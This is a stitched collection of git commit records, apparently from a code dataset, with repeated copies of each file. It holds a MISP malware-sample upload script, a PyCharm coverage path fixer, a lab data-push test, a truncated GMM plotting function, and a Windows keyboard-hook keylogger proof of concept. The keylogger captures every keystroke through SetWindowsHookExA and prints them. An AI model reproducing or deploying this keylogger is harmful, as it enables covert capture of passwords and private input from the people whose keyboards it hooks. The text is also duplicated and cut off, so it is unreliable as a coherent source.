args = parser.parse_args()
misp = init(url, priv)
if os.path.isfile(args.upload):
upload_file(misp, args.event, args.upload)
elif os.path.isdir(args.upload):
for filename in glob.iglob(os.path.join(args.upload + '*')):
upload_file(misp, args.event, filename)
|
Add test script to add attachement to event#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import priv
import argparse
import os
import glob
import base64
import json
import time
url = 'https://misppriv.circl.lu'
def init(url, key):
return PyMISP(url, key, True, 'json')
def upload_file(m, eid, path):
curevent = misp.get_event(eid)
j = curevent.json()
if j.get("Event"):
with open(path, "rb") as curfile:
j["Event"].update({"data": base64.b64encode(curfile.read())})
j["Event"]["timestamp"] = int(time.time())
out = misp.update_event(args.event, json.dumps(j))
print out, out.text
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Send malware sample to MISP.')
parser.add_argument("-u", "--upload", type=str, required=True, help="File or directory of files to upload.")
parser.add_argument("-e", "--event", type=int, help="Event to update with a sample (if none, create a new event).")
args = parser.parse_args()
misp = init(url, priv)
if os.path.isfile(args.upload):
upload_file(misp, args.event, args.upload)
elif os.path.isdir(args.upload):
for filename in glob.iglob(os.path.join(args.upload + '*')):
upload_file(misp, args.event, filename)
|
<commit_before><commit_msg>Add test script to add attachement to event<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import priv
import argparse
import os
import glob
import base64
import json
import time
url = 'https://misppriv.circl.lu'
def init(url, key):
return PyMISP(url, key, True, 'json')
def upload_file(m, eid, path):
curevent = misp.get_event(eid)
j = curevent.json()
if j.get("Event"):
with open(path, "rb") as curfile:
j["Event"].update({"data": base64.b64encode(curfile.read())})
j["Event"]["timestamp"] = int(time.time())
out = misp.update_event(args.event, json.dumps(j))
print out, out.text
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Send malware sample to MISP.')
parser.add_argument("-u", "--upload", type=str, required=True, help="File or directory of files to upload.")
parser.add_argument("-e", "--event", type=int, help="Event to update with a sample (if none, create a new event).")
args = parser.parse_args()
misp = init(url, priv)
if os.path.isfile(args.upload):
upload_file(misp, args.event, args.upload)
elif os.path.isdir(args.upload):
for filename in glob.iglob(os.path.join(args.upload + '*')):
upload_file(misp, args.event, filename)
|
|
2f3a60f9163dc99b2329effe256a587e50027993
|
dev_tools/src/d1_dev/pycharm-fix-coverage-paths.py
|
dev_tools/src/d1_dev/pycharm-fix-coverage-paths.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PyCharm can't resolve the relative paths written by pytest's coverage plugin.
This converts them to absolute, which PyCharm handles.
"""
import logging
import os
import xml.etree.ElementTree
import d1_dev.util
import d1_common.type_conversions
import d1_common.util
import d1_common.xml
def main():
d1_common.util.log_setup()
repo_root_path = d1_dev.util.find_repo_root()
logging.info('Repository: {}'.format(repo_root_path))
cov_xml_path = os.path.join(repo_root_path, 'coverage.xml')
fixed_cov_xml_path = os.path.join(repo_root_path, 'fixed_coverage.xml')
with open(cov_xml_path, 'rb') as f:
cov_tree = d1_common.type_conversions.str_to_etree(f.read())
filename_el_list = cov_tree.findall('.//*[@filename]')
for filename_el in filename_el_list:
filename_el.attrib['filename'] = os.path.join(
repo_root_path, filename_el.attrib['filename']
)
fixed_cov_xml = xml.etree.ElementTree.tostring(cov_tree, 'utf-8')
with open(fixed_cov_xml_path, 'wb') as f:
f.write(d1_common.xml.pretty_xml(fixed_cov_xml))
if __name__ == '__main__':
main()
|
Add script that fixes paths in coverage.xml for use in PyCharm
|
Add script that fixes paths in coverage.xml for use in PyCharm
|
Python
|
apache-2.0
|
DataONEorg/d1_python,DataONEorg/d1_python,DataONEorg/d1_python,DataONEorg/d1_python
|
Add script that fixes paths in coverage.xml for use in PyCharm
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PyCharm can't resolve the relative paths written by pytest's coverage plugin.
This converts them to absolute, which PyCharm handles.
"""
import logging
import os
import xml.etree.ElementTree
import d1_dev.util
import d1_common.type_conversions
import d1_common.util
import d1_common.xml
def main():
d1_common.util.log_setup()
repo_root_path = d1_dev.util.find_repo_root()
logging.info('Repository: {}'.format(repo_root_path))
cov_xml_path = os.path.join(repo_root_path, 'coverage.xml')
fixed_cov_xml_path = os.path.join(repo_root_path, 'fixed_coverage.xml')
with open(cov_xml_path, 'rb') as f:
cov_tree = d1_common.type_conversions.str_to_etree(f.read())
filename_el_list = cov_tree.findall('.//*[@filename]')
for filename_el in filename_el_list:
filename_el.attrib['filename'] = os.path.join(
repo_root_path, filename_el.attrib['filename']
)
fixed_cov_xml = xml.etree.ElementTree.tostring(cov_tree, 'utf-8')
with open(fixed_cov_xml_path, 'wb') as f:
f.write(d1_common.xml.pretty_xml(fixed_cov_xml))
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add script that fixes paths in coverage.xml for use in PyCharm<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PyCharm can't resolve the relative paths written by pytest's coverage plugin.
This converts them to absolute, which PyCharm handles.
"""
import logging
import os
import xml.etree.ElementTree
import d1_dev.util
import d1_common.type_conversions
import d1_common.util
import d1_common.xml
def main():
d1_common.util.log_setup()
repo_root_path = d1_dev.util.find_repo_root()
logging.info('Repository: {}'.format(repo_root_path))
cov_xml_path = os.path.join(repo_root_path, 'coverage.xml')
fixed_cov_xml_path = os.path.join(repo_root_path, 'fixed_coverage.xml')
with open(cov_xml_path, 'rb') as f:
cov_tree = d1_common.type_conversions.str_to_etree(f.read())
filename_el_list = cov_tree.findall('.//*[@filename]')
for filename_el in filename_el_list:
filename_el.attrib['filename'] = os.path.join(
repo_root_path, filename_el.attrib['filename']
)
fixed_cov_xml = xml.etree.ElementTree.tostring(cov_tree, 'utf-8')
with open(fixed_cov_xml_path, 'wb') as f:
f.write(d1_common.xml.pretty_xml(fixed_cov_xml))
if __name__ == '__main__':
main()
|
Add script that fixes paths in coverage.xml for use in PyCharm#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PyCharm can't resolve the relative paths written by pytest's coverage plugin.
This converts them to absolute, which PyCharm handles.
"""
import logging
import os
import xml.etree.ElementTree
import d1_dev.util
import d1_common.type_conversions
import d1_common.util
import d1_common.xml
def main():
d1_common.util.log_setup()
repo_root_path = d1_dev.util.find_repo_root()
logging.info('Repository: {}'.format(repo_root_path))
cov_xml_path = os.path.join(repo_root_path, 'coverage.xml')
fixed_cov_xml_path = os.path.join(repo_root_path, 'fixed_coverage.xml')
with open(cov_xml_path, 'rb') as f:
cov_tree = d1_common.type_conversions.str_to_etree(f.read())
filename_el_list = cov_tree.findall('.//*[@filename]')
for filename_el in filename_el_list:
filename_el.attrib['filename'] = os.path.join(
repo_root_path, filename_el.attrib['filename']
)
fixed_cov_xml = xml.etree.ElementTree.tostring(cov_tree, 'utf-8')
with open(fixed_cov_xml_path, 'wb') as f:
f.write(d1_common.xml.pretty_xml(fixed_cov_xml))
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add script that fixes paths in coverage.xml for use in PyCharm<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PyCharm can't resolve the relative paths written by pytest's coverage plugin.
This converts them to absolute, which PyCharm handles.
"""
import logging
import os
import xml.etree.ElementTree
import d1_dev.util
import d1_common.type_conversions
import d1_common.util
import d1_common.xml
def main():
d1_common.util.log_setup()
repo_root_path = d1_dev.util.find_repo_root()
logging.info('Repository: {}'.format(repo_root_path))
cov_xml_path = os.path.join(repo_root_path, 'coverage.xml')
fixed_cov_xml_path = os.path.join(repo_root_path, 'fixed_coverage.xml')
with open(cov_xml_path, 'rb') as f:
cov_tree = d1_common.type_conversions.str_to_etree(f.read())
filename_el_list = cov_tree.findall('.//*[@filename]')
for filename_el in filename_el_list:
filename_el.attrib['filename'] = os.path.join(
repo_root_path, filename_el.attrib['filename']
)
fixed_cov_xml = xml.etree.ElementTree.tostring(cov_tree, 'utf-8')
with open(fixed_cov_xml_path, 'wb') as f:
f.write(d1_common.xml.pretty_xml(fixed_cov_xml))
if __name__ == '__main__':
main()
|
|
2740cd71b836bfe86819aea9c4a71e64c42a5f2a
|
hooking.py
|
hooking.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 17 01:16:23 2016
@author: John Troony
"""
import sys
from ctypes import *
from ctypes.wintypes import MSG
from ctypes.wintypes import DWORD
user32 = windll.user32
kernel32 = windll.kernel32
WH_KEYBOARD_LL=13
WM_KEYDOWN=0x0100
CTRL_CODE = 162
class KeyLogger:
keystrokesx = ''
def __init__(self):
self.lUser32 = user32
self.hooked = None
def installHookProc(self, pointer):
self.hooked = self.lUser32.SetWindowsHookExA(WH_KEYBOARD_LL, pointer,
kernel32.GetModuleHandleW(None),0)
if not self.hooked:
return False
return True
def uninstallHookProc(self):
if self.hooked is None:
return
self.lUser32.UnhookWindowsHookEx(self.hooked)
self.hooked = None
def getFPTR(fn):
CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
return CMPFUNC(fn)
def hookProc(nCode, wParam, lParam):
if wParam is not WM_KEYDOWN:
return user32.CallNextHookEx(keyLogger.hooked, nCode,wParam, lParam)
hookedKey = chr(lParam[0])
keystrokesx += hookedKey
if(CTRL_CODE == int(lParam[0])):
print keystrokesx
print "Ctrl pressed, call uninstallHook()"
keyLogger.uninstallHookProc()
sys.exit(-1)
return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam,lParam)
def startKeyLog():
msg = MSG()
user32.GetMessageA(byref(msg),0,0,0)
keyLogger = KeyLogger() #start of hook process
pointer = getFPTR(hookProc)
if keyLogger.installHookProc(pointer):
print "installed keyLogger"
startKeyLog()
|
Add a Python PoC keylogger
|
Add a Python PoC keylogger
|
Python
|
cc0-1.0
|
JohnTroony/Scriptology,JohnTroony/Scriptology,JohnTroony/Scriptology,JohnTroony/Scriptology,JohnTroony/Scriptology,JohnTroony/Scriptology
|
Add a Python PoC keylogger
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 17 01:16:23 2016
@author: John Troony
"""
import sys
from ctypes import *
from ctypes.wintypes import MSG
from ctypes.wintypes import DWORD
user32 = windll.user32
kernel32 = windll.kernel32
WH_KEYBOARD_LL=13
WM_KEYDOWN=0x0100
CTRL_CODE = 162
class KeyLogger:
keystrokesx = ''
def __init__(self):
self.lUser32 = user32
self.hooked = None
def installHookProc(self, pointer):
self.hooked = self.lUser32.SetWindowsHookExA(WH_KEYBOARD_LL, pointer,
kernel32.GetModuleHandleW(None),0)
if not self.hooked:
return False
return True
def uninstallHookProc(self):
if self.hooked is None:
return
self.lUser32.UnhookWindowsHookEx(self.hooked)
self.hooked = None
def getFPTR(fn):
CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
return CMPFUNC(fn)
def hookProc(nCode, wParam, lParam):
if wParam is not WM_KEYDOWN:
return user32.CallNextHookEx(keyLogger.hooked, nCode,wParam, lParam)
hookedKey = chr(lParam[0])
keystrokesx += hookedKey
if(CTRL_CODE == int(lParam[0])):
print keystrokesx
print "Ctrl pressed, call uninstallHook()"
keyLogger.uninstallHookProc()
sys.exit(-1)
return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam,lParam)
def startKeyLog():
msg = MSG()
user32.GetMessageA(byref(msg),0,0,0)
keyLogger = KeyLogger() #start of hook process
pointer = getFPTR(hookProc)
if keyLogger.installHookProc(pointer):
print "installed keyLogger"
startKeyLog()
|
<commit_before><commit_msg>Add a Python PoC keylogger<commit_after>
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 17 01:16:23 2016
@author: John Troony
"""
import sys
from ctypes import *
from ctypes.wintypes import MSG
from ctypes.wintypes import DWORD
user32 = windll.user32
kernel32 = windll.kernel32
WH_KEYBOARD_LL=13
WM_KEYDOWN=0x0100
CTRL_CODE = 162
class KeyLogger:
keystrokesx = ''
def __init__(self):
self.lUser32 = user32
self.hooked = None
def installHookProc(self, pointer):
self.hooked = self.lUser32.SetWindowsHookExA(WH_KEYBOARD_LL, pointer,
kernel32.GetModuleHandleW(None),0)
if not self.hooked:
return False
return True
def uninstallHookProc(self):
if self.hooked is None:
return
self.lUser32.UnhookWindowsHookEx(self.hooked)
self.hooked = None
def getFPTR(fn):
CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
return CMPFUNC(fn)
def hookProc(nCode, wParam, lParam):
if wParam is not WM_KEYDOWN:
return user32.CallNextHookEx(keyLogger.hooked, nCode,wParam, lParam)
hookedKey = chr(lParam[0])
keystrokesx += hookedKey
if(CTRL_CODE == int(lParam[0])):
print keystrokesx
print "Ctrl pressed, call uninstallHook()"
keyLogger.uninstallHookProc()
sys.exit(-1)
return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam,lParam)
def startKeyLog():
msg = MSG()
user32.GetMessageA(byref(msg),0,0,0)
keyLogger = KeyLogger() #start of hook process
pointer = getFPTR(hookProc)
if keyLogger.installHookProc(pointer):
print "installed keyLogger"
startKeyLog()
|
Add a Python PoC keylogger# -*- coding: utf-8 -*-
"""
Created on Sat Sep 17 01:16:23 2016
@author: John Troony
"""
import sys
from ctypes import *
from ctypes.wintypes import MSG
from ctypes.wintypes import DWORD
user32 = windll.user32
kernel32 = windll.kernel32
WH_KEYBOARD_LL=13
WM_KEYDOWN=0x0100
CTRL_CODE = 162
class KeyLogger:
keystrokesx = ''
def __init__(self):
self.lUser32 = user32
self.hooked = None
def installHookProc(self, pointer):
self.hooked = self.lUser32.SetWindowsHookExA(WH_KEYBOARD_LL, pointer,
kernel32.GetModuleHandleW(None),0)
if not self.hooked:
return False
return True
def uninstallHookProc(self):
if self.hooked is None:
return
self.lUser32.UnhookWindowsHookEx(self.hooked)
self.hooked = None
def getFPTR(fn):
CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
return CMPFUNC(fn)
def hookProc(nCode, wParam, lParam):
if wParam is not WM_KEYDOWN:
return user32.CallNextHookEx(keyLogger.hooked, nCode,wParam, lParam)
hookedKey = chr(lParam[0])
keystrokesx += hookedKey
if(CTRL_CODE == int(lParam[0])):
print keystrokesx
print "Ctrl pressed, call uninstallHook()"
keyLogger.uninstallHookProc()
sys.exit(-1)
return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam,lParam)
def startKeyLog():
msg = MSG()
user32.GetMessageA(byref(msg),0,0,0)
keyLogger = KeyLogger() #start of hook process
pointer = getFPTR(hookProc)
if keyLogger.installHookProc(pointer):
print "installed keyLogger"
startKeyLog()
|
<commit_before><commit_msg>Add a Python PoC keylogger<commit_after># -*- coding: utf-8 -*-
"""
Created on Sat Sep 17 01:16:23 2016
@author: John Troony
"""
import sys
from ctypes import *
from ctypes.wintypes import MSG
from ctypes.wintypes import DWORD
user32 = windll.user32
kernel32 = windll.kernel32
WH_KEYBOARD_LL=13
WM_KEYDOWN=0x0100
CTRL_CODE = 162
class KeyLogger:
keystrokesx = ''
def __init__(self):
self.lUser32 = user32
self.hooked = None
def installHookProc(self, pointer):
self.hooked = self.lUser32.SetWindowsHookExA(WH_KEYBOARD_LL, pointer,
kernel32.GetModuleHandleW(None),0)
if not self.hooked:
return False
return True
def uninstallHookProc(self):
if self.hooked is None:
return
self.lUser32.UnhookWindowsHookEx(self.hooked)
self.hooked = None
def getFPTR(fn):
CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
return CMPFUNC(fn)
def hookProc(nCode, wParam, lParam):
if wParam is not WM_KEYDOWN:
return user32.CallNextHookEx(keyLogger.hooked, nCode,wParam, lParam)
hookedKey = chr(lParam[0])
keystrokesx += hookedKey
if(CTRL_CODE == int(lParam[0])):
print keystrokesx
print "Ctrl pressed, call uninstallHook()"
keyLogger.uninstallHookProc()
sys.exit(-1)
return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam,lParam)
def startKeyLog():
msg = MSG()
user32.GetMessageA(byref(msg),0,0,0)
keyLogger = KeyLogger() #start of hook process
pointer = getFPTR(hookProc)
if keyLogger.installHookProc(pointer):
print "installed keyLogger"
startKeyLog()
|
|
53a575f3b1da3e3edccc8f7e2d958134d724b3d4
|
testsuite/python/modDataSeq.py
|
testsuite/python/modDataSeq.py
|
# -*- coding: utf-8 -*-
## @file testsuite/python/modDataSeqTest.py
## @date feb. 2016
## @author PhRG - opticalp.fr
##
## Test the data push system
#
# Copyright (c) 2016 Ph. Renaud-Goud / Opticalp
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
def myMain():
"""Main function. Run the tests. """
print "Test the basic features of the data push system. "
fac = Factory("DemoRootFactory")
print "Retrieved factory: " + fac.name
print "Create module from leafDataSeq factory"
mod1 = fac.select("branch").select("leafDataSeq").create("mod1")
print "module " + mod1.name + " created. "
print "Create module from leafSeqAccu factory"
mod2a = fac.select("branch").select("leafSeqAccu").create("mod2a")
print "module " + mod2a.name + " created. "
print "Create module from leafSeqMax factory"
mod2b = fac.select("branch").select("leafSeqAccu").create("mod2b")
print "module " + mod2b.name + " created. "
bind(mod1.outPorts()[0], mod2a.inPorts()[0])
bind(mod1.outPorts()[0], mod2b.inPorts()[0])
print "Query mod1 output targets: "
for target in mod1.outPorts()[0].getTargetPorts():
print ( target.name + ", from module: " +
target.parent().name )
# launch action
print "End of script modDataSeqTest.py"
# main body
import sys
import os
if len(sys.argv) >= 1:
# probably called from InstrumentAll
checker = os.path.basename(sys.argv[0])
if checker == "instrumentall":
print "current script: ",os.path.realpath(__file__)
from instru import *
myMain()
exit(0)
print "Presumably not called from InstrumentAll >> Exiting..."
exit("This script has to be launched from inside InstrumentAll")
|
Add a simple test for the push model
|
Add a simple test for the push model
|
Python
|
mit
|
Opticalp/instrumentall,Opticalp/instrumentall,Opticalp/instrumentall,Opticalp/instrumentall
|
Add a simple test for the push model
|
# -*- coding: utf-8 -*-
## @file testsuite/python/modDataSeqTest.py
## @date feb. 2016
## @author PhRG - opticalp.fr
##
## Test the data push system
#
# Copyright (c) 2016 Ph. Renaud-Goud / Opticalp
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
def myMain():
"""Main function. Run the tests. """
print "Test the basic features of the data push system. "
fac = Factory("DemoRootFactory")
print "Retrieved factory: " + fac.name
print "Create module from leafDataSeq factory"
mod1 = fac.select("branch").select("leafDataSeq").create("mod1")
print "module " + mod1.name + " created. "
print "Create module from leafSeqAccu factory"
mod2a = fac.select("branch").select("leafSeqAccu").create("mod2a")
print "module " + mod2a.name + " created. "
print "Create module from leafSeqMax factory"
mod2b = fac.select("branch").select("leafSeqAccu").create("mod2b")
print "module " + mod2b.name + " created. "
bind(mod1.outPorts()[0], mod2a.inPorts()[0])
bind(mod1.outPorts()[0], mod2b.inPorts()[0])
print "Query mod1 output targets: "
for target in mod1.outPorts()[0].getTargetPorts():
print ( target.name + ", from module: " +
target.parent().name )
# launch action
print "End of script modDataSeqTest.py"
# main body
import sys
import os
if len(sys.argv) >= 1:
# probably called from InstrumentAll
checker = os.path.basename(sys.argv[0])
if checker == "instrumentall":
print "current script: ",os.path.realpath(__file__)
from instru import *
myMain()
exit(0)
print "Presumably not called from InstrumentAll >> Exiting..."
exit("This script has to be launched from inside InstrumentAll")
|
<commit_before><commit_msg>Add a simple test for the push model<commit_after>
|
# -*- coding: utf-8 -*-
## @file testsuite/python/modDataSeqTest.py
## @date feb. 2016
## @author PhRG - opticalp.fr
##
## Test the data push system
#
# Copyright (c) 2016 Ph. Renaud-Goud / Opticalp
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
def myMain():
"""Main function. Run the tests. """
print "Test the basic features of the data push system. "
fac = Factory("DemoRootFactory")
print "Retrieved factory: " + fac.name
print "Create module from leafDataSeq factory"
mod1 = fac.select("branch").select("leafDataSeq").create("mod1")
print "module " + mod1.name + " created. "
print "Create module from leafSeqAccu factory"
mod2a = fac.select("branch").select("leafSeqAccu").create("mod2a")
print "module " + mod2a.name + " created. "
print "Create module from leafSeqMax factory"
mod2b = fac.select("branch").select("leafSeqAccu").create("mod2b")
print "module " + mod2b.name + " created. "
bind(mod1.outPorts()[0], mod2a.inPorts()[0])
bind(mod1.outPorts()[0], mod2b.inPorts()[0])
print "Query mod1 output targets: "
for target in mod1.outPorts()[0].getTargetPorts():
print ( target.name + ", from module: " +
target.parent().name )
# launch action
print "End of script modDataSeqTest.py"
# main body
import sys
import os
if len(sys.argv) >= 1:
# probably called from InstrumentAll
checker = os.path.basename(sys.argv[0])
if checker == "instrumentall":
print "current script: ",os.path.realpath(__file__)
from instru import *
myMain()
exit(0)
print "Presumably not called from InstrumentAll >> Exiting..."
exit("This script has to be launched from inside InstrumentAll")
|
Add a simple test for the push model# -*- coding: utf-8 -*-
## @file testsuite/python/modDataSeqTest.py
## @date feb. 2016
## @author PhRG - opticalp.fr
##
## Test the data push system
#
# Copyright (c) 2016 Ph. Renaud-Goud / Opticalp
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
def myMain():
"""Main function. Run the tests. """
print "Test the basic features of the data push system. "
fac = Factory("DemoRootFactory")
print "Retrieved factory: " + fac.name
print "Create module from leafDataSeq factory"
mod1 = fac.select("branch").select("leafDataSeq").create("mod1")
print "module " + mod1.name + " created. "
print "Create module from leafSeqAccu factory"
mod2a = fac.select("branch").select("leafSeqAccu").create("mod2a")
print "module " + mod2a.name + " created. "
print "Create module from leafSeqMax factory"
mod2b = fac.select("branch").select("leafSeqAccu").create("mod2b")
print "module " + mod2b.name + " created. "
bind(mod1.outPorts()[0], mod2a.inPorts()[0])
bind(mod1.outPorts()[0], mod2b.inPorts()[0])
print "Query mod1 output targets: "
for target in mod1.outPorts()[0].getTargetPorts():
print ( target.name + ", from module: " +
target.parent().name )
# launch action
print "End of script modDataSeqTest.py"
# main body
import sys
import os
if len(sys.argv) >= 1:
# probably called from InstrumentAll
checker = os.path.basename(sys.argv[0])
if checker == "instrumentall":
print "current script: ",os.path.realpath(__file__)
from instru import *
myMain()
exit(0)
print "Presumably not called from InstrumentAll >> Exiting..."
exit("This script has to be launched from inside InstrumentAll")
|
<commit_before><commit_msg>Add a simple test for the push model<commit_after># -*- coding: utf-8 -*-
## @file testsuite/python/modDataSeqTest.py
## @date feb. 2016
## @author PhRG - opticalp.fr
##
## Test the data push system
#
# Copyright (c) 2016 Ph. Renaud-Goud / Opticalp
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
def myMain():
"""Main function. Run the tests. """
print "Test the basic features of the data push system. "
fac = Factory("DemoRootFactory")
print "Retrieved factory: " + fac.name
print "Create module from leafDataSeq factory"
mod1 = fac.select("branch").select("leafDataSeq").create("mod1")
print "module " + mod1.name + " created. "
print "Create module from leafSeqAccu factory"
mod2a = fac.select("branch").select("leafSeqAccu").create("mod2a")
print "module " + mod2a.name + " created. "
print "Create module from leafSeqMax factory"
mod2b = fac.select("branch").select("leafSeqAccu").create("mod2b")
print "module " + mod2b.name + " created. "
bind(mod1.outPorts()[0], mod2a.inPorts()[0])
bind(mod1.outPorts()[0], mod2b.inPorts()[0])
print "Query mod1 output targets: "
for target in mod1.outPorts()[0].getTargetPorts():
print ( target.name + ", from module: " +
target.parent().name )
# launch action
print "End of script modDataSeqTest.py"
# main body
import sys
import os
if len(sys.argv) >= 1:
# probably called from InstrumentAll
checker = os.path.basename(sys.argv[0])
if checker == "instrumentall":
print "current script: ",os.path.realpath(__file__)
from instru import *
myMain()
exit(0)
print "Presumably not called from InstrumentAll >> Exiting..."
exit("This script has to be launched from inside InstrumentAll")
|
|
7b660d90dd7e9c1518a925a174d43180a46f5d4d
|
src/utils/plot_gmm.py
|
src/utils/plot_gmm.py
|
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
@staticmethod
def plot_gmm(gmm, true_ll=False):
"""Plots the contour map of a GMM on top of a world map
Partially from: http://matplotlib.org/basemap/users/examples.html
Will also plot the best estimated location as well as a true location if passed in"""
plt.figure()
x = np.linspace(-180,180, num=3600)
y = np.linspace(90,-90, num=180)
#GMM uses lat, lon so must flip in to obtain the contours correctly
X, Y = np.meshgrid(y,x)
XX = np.array([X.ravel(), Y.ravel()]).T
#Obtains the per-sample log probabilities of the data under the model
Z = -gmm.score_samples(XX)[0]
Z = Z.reshape(X.shape)
#set up and draw the world map
m = Basemap(projection='mill', lon_0=0)
m.drawcountries()
m.drawcoastlines()
m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0]) # draw parallels
m.drawmeridians(np.arange(0.,420.,60.),labels=[0,0,0,1]) # draw meridians
cmap = mpl.cm.pink
#for plotting we want to be back in lon, lat space so flip back
X, Y = m(Y,X)
#plot the contour lines as well as a color bar
CS = m.contourf(X, Y, Z, 25, cmap=cmap)
CB = plt.colorbar(CS, shrink=0.8, extend='both')
# Plot estimated location
(best_lat, best_lon) = gmm.means_[np.argmax(gmm.weights_)]
best_lat, best_lon = m(best_lon, best_lat)
plt.plot(best_lat, best_lon, '*g')
# If provided also plot the true lat/lon expected to come in as lat,lon
if true_ll:
lat, lon = m(true_ll[1], true_ll[0])
